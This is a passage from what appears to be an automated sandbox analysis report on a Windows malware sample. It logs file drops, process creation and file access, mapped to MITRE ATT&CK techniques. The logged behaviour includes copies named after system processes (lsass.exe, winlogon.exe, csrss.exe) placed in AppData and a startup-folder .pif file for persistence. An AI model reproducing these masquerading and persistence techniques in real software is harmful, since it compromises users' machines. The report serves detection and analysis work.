\"IExplorer.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\LSASS.EXE\" - (UID: 00000000-00005576)\n \"IExplorer.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\SMSS.EXE\" - (UID: 00000000-00005576)\n \"WINLOGON.EXE\" called \"CreateProcessW\" with parameter \"%WINDIR%\\D3_08.exe\" - (UID: 00000000-00001308)\n \"WINLOGON.EXE\" called \"CreateProcessW\" with parameter \"%WINDIR%\\system32\\IExplorer.exe\" - (UID: 00000000-00001308)\n \"WINLOGON.EXE\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" - (UID: 00000000-00001308)\n \"WINLOGON.EXE\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" - (UID: 00000000-00001308)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526\" has an executable section named \".text\"\n \"services.exe\" has an executable section named \".text\"\n \"D3_08.exe\" has an executable section named \".text\"\n \"shell.exe\" has an executable section named \".text\"\n \"IExplorer.exe\" has an executable section named \".text\"\n \"D3_08.exe.bin\" has an executable section named \".text\"\n \"Data HAPUBWS.exe\" has an executable section named \".text\"\n \"Empty.pif\" has an executable section named \".text\"\n \"New Folder.exe\" has an executable section named \".text\"\n \"CSRSS.EXE.bin\" has an executable section named \".text\"\n \"SERVICES.EXE\" has an executable section named \".text\"\n \"D3_08.EXE.67E3CC1F.bin\" has an executable section named \".text\"\n \"SMSS.EXE\" has an executable section named \".text\"\n \"LSASS.EXE\" has an executable section named \".text\"\n \"MrD3_08.scr\" has an executable section named \".text\"\n \"IEXPLORER.EXE.67E3CD97.bin\" has an executable section named \".text\"\n \"WINLOGON.EXE\" has an executable section named \".text\"\n \"D3_08.EXE.67E3CBAD.bin\" has an executable section named \".text\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526\" has an writable section named \".data\"\n \"services.exe\" has an writable section named \".data\"\n \"D3_08.exe\" has an writable section named \".data\"\n \"shell.exe\" has an writable section named \".data\"\n \"IExplorer.exe\" has an writable section named \".data\"\n \"D3_08.exe.bin\" has an writable section named \".data\"\n \"Data HAPUBWS.exe\" has an writable section named \".data\"\n \"Empty.pif\" has an writable section named \".data\"\n \"New Folder.exe\" has an writable section named \".data\"\n \"CSRSS.EXE.bin\" has an writable section named \".data\"\n \"SERVICES.EXE\" has an writable section named \".data\"\n \"D3_08.EXE.67E3CC1F.bin\" has an writable section named \".data\"\n \"SMSS.EXE\" has an writable section named \".data\"\n \"LSASS.EXE\" has an writable section named \".data\"\n \"MrD3_08.scr\" has an writable section named \".data\"\n \"IEXPLORER.EXE.67E3CD97.bin\" has an writable section named \".data\"\n \"WINLOGON.EXE\" has an writable section named \".data\"\n \"D3_08.EXE.67E3CBAD.bin\" has an writable section named \".data\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "binary-37", "type": 8, "relevance": 3, "name": "Drops files inside appdata directory", "description": "Dropped file: \"services.exe\" - Location: [%LOCALAPPDATA%\\services.exe]- [targetUID: 00000000-00000940]\n Dropped file: \"SERVICES.EXE\" - Location: [%LOCALAPPDATA%\\WINDOWS\\SERVICES.EXE]- [targetUID: 00000000-00000940]\n Dropped file: \"SMSS.EXE\" - Location: [%LOCALAPPDATA%\\WINDOWS\\SMSS.EXE]- [targetUID: 00000000-00000940]\n Dropped file: \"LSASS.EXE\" - Location: [%LOCALAPPDATA%\\WINDOWS\\LSASS.EXE]- [targetUID: 00000000-00000940]\n Dropped file: \"WINLOGON.EXE\" - Location: [%LOCALAPPDATA%\\WINDOWS\\WINLOGON.EXE]- [targetUID: 00000000-00000940]\n Dropped file: \"lsass.exe\" - Location: [%LOCALAPPDATA%\\lsass.exe]- [targetUID: 00000000-00000940]\n Dropped file: \"IExplorer.exe\" - Location: [%LOCALAPPDATA%\\IExplorer.exe]- [targetUID: 00000000-00000940]\n Dropped file: \"winlogon.exe\" - Location: [%LOCALAPPDATA%\\winlogon.exe]- [targetUID: 00000000-00000940]\n Dropped file: \"smss.exe\" - Location: [%LOCALAPPDATA%\\smss.exe]- [targetUID: 00000000-00000940]\n Dropped file: \"D3_08.exe\" - Location: [%LOCALAPPDATA%\\D3_08.exe]- [targetUID: 00000000-00000940]\n Dropped file: \"csrss.exe\" - Location: [%LOCALAPPDATA%\\csrss.exe]- [targetUID: 00000000-00000940]\n Dropped file: \"WINLOGON.EXE\" - Location: [%LOCALAPPDATA%\\WINLOGON.EXE]- [targetUID: 00000000-00000940]\n Dropped file: \"CSRSS.EXE\" - Location: [%LOCALAPPDATA%\\CSRSS.EXE]- [targetUID: 00000000-00000940]\n Dropped file: \"CSRSS.EXE\" - Location: [%LOCALAPPDATA%\\WINDOWS\\CSRSS.EXE]- [targetUID: 00000000-00000940]", "origin": "Binary File", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" trying to access non-existent file \"C:\\MSVBVM60.DLL\"\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" trying to access non-existent file \"C:\\CRYPTBASE.dll\"\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" trying to access non-existent file \"C:\\SXS.DLL\"\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" trying to access non-existent file \"C:\\CRYPTSP.dll\"\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" trying to access non-existent file \"C:\\dwmapi.dll\"\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" trying to access non-existent file \"C:\\ntmarta.dll\"\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\WINLOGON.EXE\"\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\LSASS.exe\"\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\CSRSS.EXE\"\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\SERVICES.EXE\"\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\SMSS.EXE\"\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" trying to access non-existent file \"C:\\Windows\\D3_08.exe\"\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" trying to access non-existent file \"C:\\D3_08.exe\"\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" trying to access non-existent file \"C:\\Windows\\system32\\shell.exe\"\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\Local.exe\"\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\Local Settings\\Application.exe\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" reads file \"c:\\users\\desktop.ini\"\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" reads file \"c:\\users\\%osuser%\\documents\\desktop.ini\"\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" reads file \"c:\\04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-16", "type": 6, "relevance": 1, "name": "Connects to LPC ports", "description": "\"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" connecting to \"\\ThemeApiPort\"\n \"D3_08.exe\" connecting to \"\\ThemeApiPort\"\n \"IExplorer.exe\" connecting to \"\\ThemeApiPort\"\n \"WINLOGON.EXE\" connecting to \"\\ThemeApiPort\"\n \"CSRSS.EXE\" connecting to \"\\ThemeApiPort\"\n \"SMSS.EXE\" connecting to \"\\ThemeApiPort\"", "origin": "API Call", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Caches\"\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" touched file \"C:\\Windows\\D3_08.exe\"\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" touched file \"C:\\Windows\\System32\\shell.exe\"\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" touched file \"C:\\Windows\\System32\\MrD3_08.scr\"\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" touched file \"C:\\Windows\\System32\\IExplorer.exe\"\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" touched file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\"\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" touched file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\WINLOGON.EXE\"\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\WINDOWS\\WINLOGON.EXE\"\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\"\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" touched file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\CSRSS.EXE\"\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\WINDOWS\\CSRSS.EXE\"\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\"\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" touched file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\SERVICES.EXE\"\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\WINDOWS\\SERVICES.EXE\"\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\"\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" touched file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\LSASS.EXE\"\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\WINDOWS\\LSASS.EXE\"\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\"\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" touched file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\SMSS.EXE\"\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\WINDOWS\\SMSS.EXE\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-235", "type": 6, "relevance": 1, "name": "Queries basic information of the specified process", "description": "\"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" queries basic process information of the \"C:\\Users\\HAPUBWS\\AppData\\Local\\lsass.exe\" (UID: 940)\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" queries basic process information of the \"C:\\share\\Data HAPUBWS.exe\" (UID: 940)\n \"D3_08.exe\" queries basic process information of the \"C:\\Users\\HAPUBWS\\AppData\\Local\\WINDOWS\\LSASS.EXE\" (UID: 4664)\n \"D3_08.exe\" queries basic process information of the \"C:\\PuRn4m4.txt\" (UID: 4664)\n \"IExplorer.exe\" queries basic process information of the \"C:\\share\" (UID: 5576)\n \"IExplorer.exe\" queries basic process information of the \"C:\\PuRn4m4.txt\" (UID: 5576)\n \"WINLOGON.EXE\" queries basic process information of the \"C:\\Users\\HAPUBWS\\AppData\\Local\\WINDOWS\\LSASS.EXE\" (UID: 1308)\n \"WINLOGON.EXE\" queries basic process information of the \"C:\\PuRn4m4.txt\" (UID: 1308)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" trying to touch file \"C:\\MSVBVM60.DLL\"\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" trying to touch file \"C:\\Windows\\system32\\MSVBVM60.DLL\"\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" trying to touch file \"C:\\Windows\\system32\\rpcss.dll\"\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" trying to touch file \"C:\\CRYPTBASE.dll\"\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" trying to touch file \"C:\\Windows\\system32\\CRYPTBASE.dll\"\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" trying to touch file \"\\Device\\KsecDD\"\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" trying to touch file \"C:\\Windows\\system32\\uxtheme.dll\"\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" trying to touch file \"C:\\04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe.cfg\"\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" trying to touch file \"C:\\SXS.DLL\"\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" trying to touch file \"C:\\Windows\\system32\\SXS.DLL\"\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" trying to touch file \"C:\\Windows\\system32\\c_932.nls\"\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" trying to touch file \"C:\\Windows\\system32\\c_949.nls\"\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" trying to touch file \"C:\\Windows\\system32\\c_950.nls\"\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" trying to touch file \"C:\\Windows\\system32\\c_936.nls\"\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" trying to access non-existent file \"C:\\04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe.cfg\"\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" trying to access non-existent file \"C:\\04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe.Local\\\"\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" trying to access non-existent file \"C:\\04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.pif\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" writes file \"c:\\share\\data hapubws.exe\"\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" writes file \"c:\\users\\hapubws\\appdata\\local\\lsass.exe\"\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" writes file \"c:\\windows\\d3_08.exe\"\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" writes file \"c:\\d3_08.exe\"\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" writes file \"c:\\windows\\system32\\shell.exe\"\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" writes file \"c:\\windows\\system32\\mrd3_08.scr\"\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" writes file \"c:\\windows\\system32\\iexplorer.exe\"\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" writes file \"c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\empty.pif\"\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\windows\\winlogon.exe\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"services.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\services.exe]- [targetUID: 00000000-00000940]\n \"D3_08.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [C:\\D3_08.exe]- [targetUID: 00000000-00000940]\n \"shell.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%WINDIR%\\System32\\shell.exe]- [targetUID: 00000000-00000940]\n \"IExplorer.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%WINDIR%\\System32\\IExplorer.exe]- [targetUID: 00000000-00000940]\n \"D3_08.exe.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"Data HAPUBWS.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [C:\\Data %OSUSER%.exe]- [targetUID: 00000000-00000940]\n \"Empty.pif\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%ALLUSERSPROFILE%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif]- [targetUID: 00000000-00000940]\n \"New Folder.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [C:\\D3_08\\New Folder.exe]- [targetUID: 00000000-00000940]\n \"CSRSS.EXE.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"SERVICES.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\WINDOWS\\SERVICES.EXE]- [targetUID: 00000000-00000940]\n \"D3_08.EXE.67E3CC1F.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"SMSS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\WINDOWS\\SMSS.EXE]- [targetUID: 00000000-00000940]\n \"LSASS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\WINDOWS\\LSASS.EXE]- [targetUID: 00000000-00000940]\n \"MrD3_08.scr\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%WINDIR%\\System32\\MrD3_08.scr]- [targetUID: 00000000-00000940]\n \"IEXPLORER.EXE.67E3CD97.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"WINLOGON.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\WINDOWS\\WINLOGON.EXE]- [targetUID: 00000000-00000940]\n \"D3_08.EXE.67E3CBAD.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"PuRn4m4.txt\" has type \"ASCII text with CRLF line terminators\"- Location: [C:\\PuRn4m4.txt]- [targetUID: 00000000-00000940]\n \"desktop.ini\" has type \"Windows desktop.ini\"- Location: [C:\\desktop.ini]- [targetUID: 00000000-00000940]\n \"lsass.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\lsass.exe]- [targetUID: 00000000-00000940]\n \"IExplorer.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\IExplorer.exe]- [targetUID: 00000000-00000940]\n \"winlogon.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\winlogon.exe]- [targetUID: 00000000-00000940]\n \"D3_08.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%WINDIR%\\D3_08.exe]- [targetUID: 00000000-00000940]\n \"smss.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\smss.exe]- [targetUID: 00000000-00000940]\n \"D3_08.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\D3_08.exe]- [targetUID: 00000000-00000940]\n \"csrss.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\csrss.exe]- [targetUID: 00000000-00000940]\n \"D3_08.EXE.67E3D312.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"WINLOGON.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\WINLOGON.EXE]- [targetUID: 00000000-00000940]\n \"CSRSS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\CSRSS.EXE]- [targetUID: 00000000-00000940]\n \"CSRSS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\WINDOWS\\CSRSS.EXE]- [targetUID: 00000000-00000940]\n \"IEXPLORER.EXE.67E3CBB0.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"IEXPLORER.EXE.67E3D31A.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-139", "type": 6, "relevance": 3, "name": "Calls an API typically used to load a resource in memory", "description": "\"IExplorer.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4337992'}\" (UID: 00000000-00005576)\n \"IExplorer.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4338040'}\" (UID: 00000000-00005576)\n \"IExplorer.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4338008'}\" (UID: 00000000-00005576)\n \"D3_08.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4337992'}\" (UID: 00000000-00005612)\n \"D3_08.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4338040'}\" (UID: 00000000-00005612)\n \"D3_08.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4338008'}\" (UID: 00000000-00005612)\n \"IExplorer.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4337992'}\" (UID: 00000000-00005784)\n \"IExplorer.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4338040'}\" (UID: 00000000-00005784)\n \"IExplorer.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4338008'}\" (UID: 00000000-00005784)\n \"D3_08.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4337992'}\" (UID: 00000000-00004928)\n \"D3_08.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4338040'}\" (UID: 00000000-00004928)\n \"D3_08.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4338008'}\" (UID: 00000000-00004928)\n \"CSRSS.EXE\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4337992'}\" (UID: 00000000-00005884)\n \"CSRSS.EXE\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4338040'}\" (UID: 00000000-00005884)\n \"CSRSS.EXE\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4338008'}\" (UID: 00000000-00005884)\n \"CSRSS.EXE\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4337992'}\" (UID: 00000000-00005824)\n \"CSRSS.EXE\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4338040'}\" (UID: 00000000-00005824)\n \"CSRSS.EXE\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4338008'}\" (UID: 00000000-00005824)\n \"IExplorer.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4337992'}\" 